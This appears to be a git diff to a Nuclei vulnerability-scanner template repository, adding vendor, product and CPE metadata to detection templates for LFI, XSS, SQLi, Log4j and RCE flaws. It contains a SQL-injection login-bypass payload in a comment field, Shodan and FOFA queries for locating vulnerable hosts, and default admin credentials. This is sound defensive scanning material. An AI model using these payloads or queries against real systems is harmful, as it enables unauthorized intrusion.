--- a/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml
+++ b/http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml
@@ -14,8 +14,12 @@ info:
max-request: 2
shodan-query: html:"buildAssetsDir" "nuxt"
fofa-query: body="buildAssetsDir" && body="__nuxt"
+ product: framework
+ vendor: nuxt
tags: huntr,lfi,nuxtjs
+ classification:
+ cpe: cpe:2.3:a:nuxt:framework:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +40,4 @@ http:
part: header
words:
- "application/json"
-# digest: 490a004630440220322f35c351e585a2931f7260360dc6a47a88a9465c1b0dd3e31f91d8795661c9022010ea1638af2831b4b8910823cef2e0f2c39df4d6b52d0cf2a2cc79a06d9ff2cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220322f35c351e585a2931f7260360dc6a47a88a9465c1b0dd3e31f91d8795661c9022010ea1638af2831b4b8910823cef2e0f2c39df4d6b52d0cf2a2cc79a06d9ff2cd:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/3cx-management-console.yaml b/http/vulnerabilities/other/3cx-management-console.yaml
index af3d134444..b39a3a4d77 100644
--- a/http/vulnerabilities/other/3cx-management-console.yaml
+++ b/http/vulnerabilities/other/3cx-management-console.yaml
@@ -11,9 +11,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: http.title:"3CX Phone System Management Console"
+ product: 3cx
+ vendor: 3cx
tags: 3cx,lfi,voip
http:
diff --git a/http/vulnerabilities/other/acti-video-lfi.yaml b/http/vulnerabilities/other/acti-video-lfi.yaml
index e5dcc8dca8..b5ad8f5266 100644
--- a/http/vulnerabilities/other/acti-video-lfi.yaml
+++ b/http/vulnerabilities/other/acti-video-lfi.yaml
@@ -13,8 +13,12 @@ info:
max-request: 1
shodan-query: title:"Web Configurator"
fofa-query: app="ACTi-视频监控"
+ product: camera_firmware
+ vendor: acti
tags: acti,lfi,iot,video,monitoring
+ classification:
+ cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/other/apache-druid-log4j.yaml b/http/vulnerabilities/other/apache-druid-log4j.yaml
index a3d3d1fa20..1889d313aa 100644
--- a/http/vulnerabilities/other/apache-druid-log4j.yaml
+++ b/http/vulnerabilities/other/apache-druid-log4j.yaml
@@ -10,10 +10,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-502
+ cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Apache Druid"
+ product: druid
+ vendor: apache
tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast
http:
@@ -36,4 +39,4 @@ http:
- type: status
status:
- 404
-# digest: 490a00463044022030f1852a5d57ce940ce4fdb486ca500f0e80230abd9ef378a7fe2339e3a96812022023a04db5bf7848f414e848dfe20c4fc02efdb87b209cdf81956d9adad83e317b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022030f1852a5d57ce940ce4fdb486ca500f0e80230abd9ef378a7fe2339e3a96812022023a04db5bf7848f414e848dfe20c4fc02efdb87b209cdf81956d9adad83e317b:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml
index 565f3a5035..f4a3244a39 100644
--- a/http/vulnerabilities/other/bagisto-csti.yaml
+++ b/http/vulnerabilities/other/bagisto-csti.yaml
@@ -12,8 +12,12 @@ info:
metadata:
fofa-query: "Bagisto"
max-request: 1
+ product: bagisto
+ vendor: webkul
tags: bagisto,csti,packetstorm,ssti
+ classification:
+ cpe: cpe:2.3:a:webkul:bagisto:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +36,4 @@ http:
part: content_type
words:
- "text/html"
-# digest: 490a00463044022015e3c2098a364345bf81fc3d793a002922c4e4a93bdaf0484a0abe3157b18ece02203d187b4fa114b97d147058f5bef877743db96ec4b5ca55cfa900f793f9219ec6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022015e3c2098a364345bf81fc3d793a002922c4e4a93bdaf0484a0abe3157b18ece02203d187b4fa114b97d147058f5bef877743db96ec4b5ca55cfa900f793f9219ec6:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/beyond-trust-xss.yaml b/http/vulnerabilities/other/beyond-trust-xss.yaml
index 06bb84947f..102b33b812 100644
--- a/http/vulnerabilities/other/beyond-trust-xss.yaml
+++ b/http/vulnerabilities/other/beyond-trust-xss.yaml
@@ -13,8 +13,12 @@ info:
max-request: 1
shodan-query: html:"BeyondTrust"
google-query: intext:"BeyondTrust" "Redistribution Prohibited"
+ product: remote_support
+ vendor: beyondtrust
tags: beyondtrust,xss,intrusive
+ classification:
+ cpe: cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/other/carrental-xss.yaml b/http/vulnerabilities/other/carrental-xss.yaml
index abbffe8fb3..fe2d4d0682 100644
--- a/http/vulnerabilities/other/carrental-xss.yaml
+++ b/http/vulnerabilities/other/carrental-xss.yaml
@@ -13,10 +13,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cwe-id: CWE-80
+ cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
shodan-query: http.html:"Car Rental Management System"
+ product: car_rental_management_system
+ vendor: car_rental_management_system_project
tags: xss,cms,authenticated,edb,intrusive
http:
diff --git a/http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml b/http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml
index 20e195261c..93ab571ff8 100644
--- a/http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml
+++ b/http/vulnerabilities/other/citrix-xenapp-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:citrix:xenapp:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: html:"/citrix/xenapp"
+ product: xenapp
+ vendor: citrix
tags: cve,cve2021,rce,jndi,log4j,citrix,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/ckan-dom-based-xss.yaml b/http/vulnerabilities/other/ckan-dom-based-xss.yaml
index 499759d38e..2296b143b6 100644
--- a/http/vulnerabilities/other/ckan-dom-based-xss.yaml
+++ b/http/vulnerabilities/other/ckan-dom-based-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:okfn:ckan:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"ckan 2.8.2" || html:"ckan 2.3"
+ product: ckan
+ vendor: okfn
tags: dom,xss
http:
diff --git a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml
index 00baccec24..2f7ab9348c 100755
--- a/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml
+++ b/http/vulnerabilities/other/cmseasy-crossall-act-sqli.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
fofa-query: app="CmsEasy"
+ product: cmseasy
+ vendor: cmseasy
tags: cmseasy,sqli
+ classification:
+ cpe: cpe:2.3:a:cmseasy:cmseasy:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/other/coldfusion-debug-xss.yaml b/http/vulnerabilities/other/coldfusion-debug-xss.yaml
index ace795546b..e530ebc8e7 100644
--- a/http/vulnerabilities/other/coldfusion-debug-xss.yaml
+++ b/http/vulnerabilities/other/coldfusion-debug-xss.yaml
@@ -11,9 +11,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
max-request: 2
shodan-query: http.component:"Adobe ColdFusion"
+ product: coldfusion
+ vendor: adobe
tags: adobe,coldfusion,xss
http:
diff --git a/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml b/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml
index 72e3d7133c..247d7a1df0 100644
--- a/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml
+++ b/http/vulnerabilities/other/dixell-xweb500-filewrite.yaml
@@ -11,8 +11,12 @@ info:
metadata:
max-request: 2
google-query: inurl:"xweb500.cgi"
+ product: dixell_xweb-500
+ vendor: emerson
tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive
+ classification:
+ cpe: cpe:2.3:h:emerson:dixell_xweb-500:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -35,4 +39,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022010e4a776681e6e34f930a04c95521eb3982e4accdc9027c58ab8459667f9a83d022100871a7712d9cb5ad42ab459ec1a05bc81afa0b87d0758b76960016461cd31cdb8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022010e4a776681e6e34f930a04c95521eb3982e4accdc9027c58ab8459667f9a83d022100871a7712d9cb5ad42ab459ec1a05bc81afa0b87d0758b76960016461cd31cdb8:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/doorgets-info-disclosure.yaml b/http/vulnerabilities/other/doorgets-info-disclosure.yaml
index 9b503c2420..d6f5ee7f22 100644
--- a/http/vulnerabilities/other/doorgets-info-disclosure.yaml
+++ b/http/vulnerabilities/other/doorgets-info-disclosure.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
google-query: "Powered with doorGets ™"
+ product: doorgets
+ vendor: doorgets
tags: doorgets,cms,packetstorm,disclosure
+ classification:
+ cpe: cpe:2.3:a:doorgets:doorgets:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -37,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502206788d55acc068a11913282587ec6d6f26f3f651173d8d4e24337be109279d687022100bc7d7cefbb3e21f172d7f7d8a525a8bb1231c61532ad0d7d849ae542d0692f46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206788d55acc068a11913282587ec6d6f26f3f651173d8d4e24337be109279d687022100bc7d7cefbb3e21f172d7f7d8a525a8bb1231c61532ad0d7d849ae542d0692f46:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/dzzoffice-xss.yaml b/http/vulnerabilities/other/dzzoffice-xss.yaml
index 34a6b980ad..4a231e7f9f 100644
--- a/http/vulnerabilities/other/dzzoffice-xss.yaml
+++ b/http/vulnerabilities/other/dzzoffice-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:dzzoffice:dzzoffice:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"dzzoffice"
+ product: dzzoffice
+ vendor: dzzoffice
tags: dzzoffice,xss
http:
diff --git a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml
index 663a02fd95..9849c0cb04 100644
--- a/http/vulnerabilities/other/ecology-oa-file-sqli.yaml
+++ b/http/vulnerabilities/other/ecology-oa-file-sqli.yaml
@@ -13,8 +13,12 @@ info:
max-request: 2
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
+ product: e-cology
+ vendor: weaver
tags: ecology,ecology-oa,sqli
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/other/ecshop-sqli.yaml b/http/vulnerabilities/other/ecshop-sqli.yaml
index 246c0301f6..6f897284f8 100644
--- a/http/vulnerabilities/other/ecshop-sqli.yaml
+++ b/http/vulnerabilities/other/ecshop-sqli.yaml
@@ -15,10 +15,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
+ cpe: cpe:2.3:a:shopex:ecshop:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
fofa-query: app="ECShop"
+ product: ecshop
+ vendor: shopex
tags: sqli,php,ecshop
http:
@@ -43,4 +46,4 @@ http:
- '[0] => Array'
- 'MySQL server error report:Array'
condition: and
-# digest: 4a0a0047304502203ae49378f799b9273219736013b01e956378963294f2c290ca0d9d8f96bfb99f022100d1b025e172f2914639fd88715d7690b6537b8255540d0155162f31e0597eb1df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203ae49378f799b9273219736013b01e956378963294f2c290ca0d9d8f96bfb99f022100d1b025e172f2914639fd88715d7690b6537b8255540d0155162f31e0597eb1df:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/elFinder-path-traversal.yaml b/http/vulnerabilities/other/elFinder-path-traversal.yaml
index 7a5d994a5c..d8bba33c6f 100644
--- a/http/vulnerabilities/other/elFinder-path-traversal.yaml
+++ b/http/vulnerabilities/other/elFinder-path-traversal.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"elfinder"
+ product: elfinder
+ vendor: std42
tags: lfi,elfinder
http:
diff --git a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
index 6e6a1f949b..887feb07e2 100644
--- a/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
+++ b/http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml
@@ -15,10 +15,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: elastic indices
+ product: elasticsearch
+ vendor: elastic
tags: jndi,log4j,rce,oast,elasticsearch,cve,cve2021,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/fastadmin-lfi.yaml b/http/vulnerabilities/other/fastadmin-lfi.yaml
index fc193575d1..0da57b2355 100644
--- a/http/vulnerabilities/other/fastadmin-lfi.yaml
+++ b/http/vulnerabilities/other/fastadmin-lfi.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
fofa-query: app="FASTADMIN-框架"
+ product: fastadmin
+ vendor: fastadmin
tags: fastadmin,lfi
+ classification:
+ cpe: cpe:2.3:a:fastadmin:fastadmin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -32,4 +36,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100fa5b97dac2270310edd8e5f61e36f45e9fa2a3496faf9cacc0bd330f402ea133022100bb4bbcb15ebabf6569c9c65e1ee8f49d6ab3b381c021c68e2b4aad17b9b8ae26:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100fa5b97dac2270310edd8e5f61e36f45e9fa2a3496faf9cacc0bd330f402ea133022100bb4bbcb15ebabf6569c9c65e1ee8f49d6ab3b381c021c68e2b4aad17b9b8ae26:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/flatpress-xss.yaml b/http/vulnerabilities/other/flatpress-xss.yaml
index dad4dff51e..deab064b45 100644
--- a/http/vulnerabilities/other/flatpress-xss.yaml
+++ b/http/vulnerabilities/other/flatpress-xss.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
+ cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.html:"Flatpress"
+ product: flatpress
+ vendor: flatpress
tags: flatpress,xss,authenticated,oss,intrusive
http:
@@ -58,4 +61,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100fa2cc4b041819edc1dc91ef9f266cebb8b68bfc43436b271e4985a9a453d9d3e022034dfdd99412f2ed6b8e769756810f1fd0451658dfed145f36f38f86086c31863:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100fa2cc4b041819edc1dc91ef9f266cebb8b68bfc43436b271e4985a9a453d9d3e022034dfdd99412f2ed6b8e769756810f1fd0451658dfed145f36f38f86086c31863:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/flexnet-log4j-rce.yaml b/http/vulnerabilities/other/flexnet-log4j-rce.yaml
index 69193dade5..380f3bb9d2 100644
--- a/http/vulnerabilities/other/flexnet-log4j-rce.yaml
+++ b/http/vulnerabilities/other/flexnet-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:flexera:flexnet_publisher:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Flexnet"
+ product: flexnet_publisher
+ vendor: flexera
tags: cve,cve2021,rce,jndi,log4j,flexnet,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/flir-ax8-rce.yaml b/http/vulnerabilities/other/flir-ax8-rce.yaml
index f3968a5fc4..a4c876e91d 100644
--- a/http/vulnerabilities/other/flir-ax8-rce.yaml
+++ b/http/vulnerabilities/other/flir-ax8-rce.yaml
@@ -13,7 +13,11 @@ info:
verified: true
max-request: 2
fofa-query: app="FLIR-FLIR-AX8"
+ product: flir_ax8_firmware
+ vendor: flir
tags: flir-ax8,rce,exploitdb,iot,sensor,authenticated
+ classification:
+ cpe: cpe:2.3:o:flir:flir_ax8_firmware:*:*:*:*:*:*:*:*
variables:
username: admin
password: admin
diff --git a/http/vulnerabilities/other/fortiportal-log4j-rce.yaml b/http/vulnerabilities/other/fortiportal-log4j-rce.yaml
index 4bde7eff22..97f0bc1211 100644
--- a/http/vulnerabilities/other/fortiportal-log4j-rce.yaml
+++ b/http/vulnerabilities/other/fortiportal-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:fortinet:fortiportal:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: html:"FortiPortal"
+ product: fortiportal
+ vendor: fortinet
tags: cve,cve2021,rce,jndi,log4j,fortiportal,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/graylog-log4j.yaml b/http/vulnerabilities/other/graylog-log4j.yaml
index 52b1e39b42..51208e31de 100644
--- a/http/vulnerabilities/other/graylog-log4j.yaml
+++ b/http/vulnerabilities/other/graylog-log4j.yaml
@@ -14,10 +14,13 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Graylog Web Interface"
+ product: graylog
+ vendor: graylog
tags: cve,cve2021,rce,jndi,log4j,graylog,kev,oast
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/hospital-management-xss.yaml b/http/vulnerabilities/other/hospital-management-xss.yaml
index 1e86e134cf..836d237130 100644
--- a/http/vulnerabilities/other/hospital-management-xss.yaml
+++ b/http/vulnerabilities/other/hospital-management-xss.yaml
@@ -12,11 +12,14 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:phptpoint:hospital_management_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.html:"Hospital Management System"
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+ product: hospital_management_system
+ vendor: phptpoint
tags: hms,hospital,cms,xss,authenticated
http:
diff --git a/http/vulnerabilities/other/hospital-management-xss2.yaml b/http/vulnerabilities/other/hospital-management-xss2.yaml
index f1e0741e15..ce161879d3 100644
--- a/http/vulnerabilities/other/hospital-management-xss2.yaml
+++ b/http/vulnerabilities/other/hospital-management-xss2.yaml
@@ -12,11 +12,14 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
+ cpe: cpe:2.3:a:phptpoint:hospital_management_system:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.html:"Hospital Management System"
comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
+ product: hospital_management_system
+ vendor: phptpoint
tags: hms,hospital,cms,xss,authenticated
http:
diff --git a/http/vulnerabilities/other/icewarp-open-redirect.yaml b/http/vulnerabilities/other/icewarp-open-redirect.yaml
index a84017a71e..2db5417400 100644
--- a/http/vulnerabilities/other/icewarp-open-redirect.yaml
+++ b/http/vulnerabilities/other/icewarp-open-redirect.yaml
@@ -10,10 +10,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-601
+ cpe: cpe:2.3:a:icewarp:icewarp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"icewarp"
+ product: icewarp
+ vendor: icewarp
tags: icewarp,redirect
http:
diff --git a/http/vulnerabilities/other/icewarp-webclient-rce.yaml b/http/vulnerabilities/other/icewarp-webclient-rce.yaml
index 2d64c2ed2e..4d07b185b3 100644
--- a/http/vulnerabilities/other/icewarp-webclient-rce.yaml
+++ b/http/vulnerabilities/other/icewarp-webclient-rce.yaml
@@ -10,9 +10,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-77
+ cpe: cpe:2.3:a:icewarp:icewarp:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"icewarp"
+ product: icewarp
+ vendor: icewarp
tags: icewarp,rce
http:
diff --git a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml
index 037e06ea3d..01c3b79857 100644
--- a/http/vulnerabilities/other/inspur-clusterengine-rce.yaml
+++ b/http/vulnerabilities/other/inspur-clusterengine-rce.yaml
@@ -15,9 +15,12 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-21224
cwe-id: CWE-88
+ cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:*
metadata:
max-request: 1
fofa-query: title="TSCEV4.0"
+ product: clusterengine
+ vendor: inspur
tags: inspur,clusterengine,rce
http:
diff --git a/http/vulnerabilities/other/kavita-lfi.yaml b/http/vulnerabilities/other/kavita-lfi.yaml
index 7f051c9db0..8d37081fc6 100644
--- a/http/vulnerabilities/other/kavita-lfi.yaml
+++ b/http/vulnerabilities/other/kavita-lfi.yaml
@@ -12,10 +12,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
+ cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"kavita"
+ product: kavita
+ vendor: kavitareader
tags: kavita,lfi,huntr
http:
diff --git a/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml b/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml
index a76d986b40..d9f2fbaaf3 100644
--- a/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml
+++ b/http/vulnerabilities/other/kingsoft-vgm-lfi.yaml
@@ -13,8 +13,12 @@ info:
verified: true
max-request: 1
fofa-query: title="金山VGM防毒墙"
+ product: kingsoft_antivirus
+ vendor: kingsoft
tags: kingsoft,vgm,lfi
+ classification:
+ cpe: cpe:2.3:a:kingsoft:kingsoft_antivirus:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml
index 9b5eab301c..1cb7f80e57 100644
--- a/http/vulnerabilities/other/kiwitcms-json-rpc.yaml
+++ b/http/vulnerabilities/other/kiwitcms-json-rpc.yaml
@@ -12,8 +12,12 @@ info:
metadata:
max-request: 1
shodan-query: title:"Kiwi TCMS - Login" http.favicon.hash:-1909533337
+ product: kiwi_tcms
+ vendor: kiwitcms
tags: kiwitcms,exposure,misconfig,hackerone
+ classification:
+ cpe: cpe:2.3:a:kiwitcms:kiwi_tcms:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -44,4 +48,4 @@ http:
part: body
json:
- .result[].username
-# digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e625a29f9198b07723d4e26329a8d2d947c7240aadf04e2859b0f6dff1acdead02200b19f7aac7e79222c4418add2934c0704dab1ee621e7b45540127028968ed156:922c64590222798bb761d5b6d8e72950
diff --git a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml
index 4c9eb461da..8009b379ca 100644
--- a/http/vulnerabilities/other/landray-oa-datajson-rce.yaml
+++ b/http/vulnerabilities/other/landray-oa-datajson-rce.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 1
fofa-query: app="Landray-OA系统"
+ product: landray_office_automation
+ vendor: landray
tags: landray,rce,oast
+ classification:
+ cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
http:
- raw:
- |
diff --git a/http/vulnerabilities/other/logstash-log4j-rce.yaml b/http/vulnerabilities/other/logstash-log4j-rce.yaml
index 8c96db8249..b582cb4091 100644
--- a/http/vulnerabilities/other/logstash-log4j-rce.yaml
+++ b/http/vulnerabilities/other/logstash-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:elastic:logstash:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: html:"logstash"
+ product: logstash
+ vendor: elastic
tags: cve,cve2021,rce,jndi,log4j,logstash,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml b/http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml
index 68f7871503..a0e686915e 100644
--- a/http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml
+++ b/http/vulnerabilities/other/manage-engine-dc-log4j-rce.yaml
@@ -13,9 +13,12 @@ info:
cvss-score: 10
cve-id: CVE-2021-44228
cwe-id: CWE-77
+ cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"ManageEngine Desktop Central"
+ product: manageengine_desktop_central
+ vendor: zohocorp
tags: cve,cve2021,rce,jndi,log4j,manage,engine,oast,kev
variables:
rand1: '{{rand_int(111, 999)}}'
diff --git a/http/vulnerabilities/other/nacos-auth-bypass.yaml b/http/vulnerabilities/other/nacos-auth-bypass.yaml
index 79629ab76c..23e9ae3523 100644
--- a/http/vulnerabilities/other/nacos-auth-bypass.yaml
+++ b/http/vulnerabilities/other/nacos-auth-bypass.yaml
@@ -14,8 +14,12 @@ info:
verified: true
max-request: 2
fofa-query: app="NACOS"
+ product: nacos
+ vendor: alibaba
tags: nacos,auth-bypass
+ classification:
+ cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/vulnerabilities/other/ncast-lfi.yaml b/http/vulnerabilities/other/ncast-lfi.yaml
index d55cd79e99..a811570c7e 100644
--- a/http/vulnerabilities/other/ncast-lfi.yaml
+++ b/http/vulnerabilities/other/ncast-lfi.yaml
@@ -12,8 +12,12 @@ info:
fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
verified: true
max-request: 1
+ product: ncast
+ vendor: ncast_project
tags: ncast,lfi
+ classification:
+ cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -34,4 +38,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c3ccb20d4d2894d7ad538e05b308dd310907922254ad4c9bda70fdb35a4209de02202ed3f40e27ef9ae92809083d6a8f7df2d7dc1c0cf4c9c7cb8cde61b8717159ff:922c64590222798bb761d5b6d8e72950
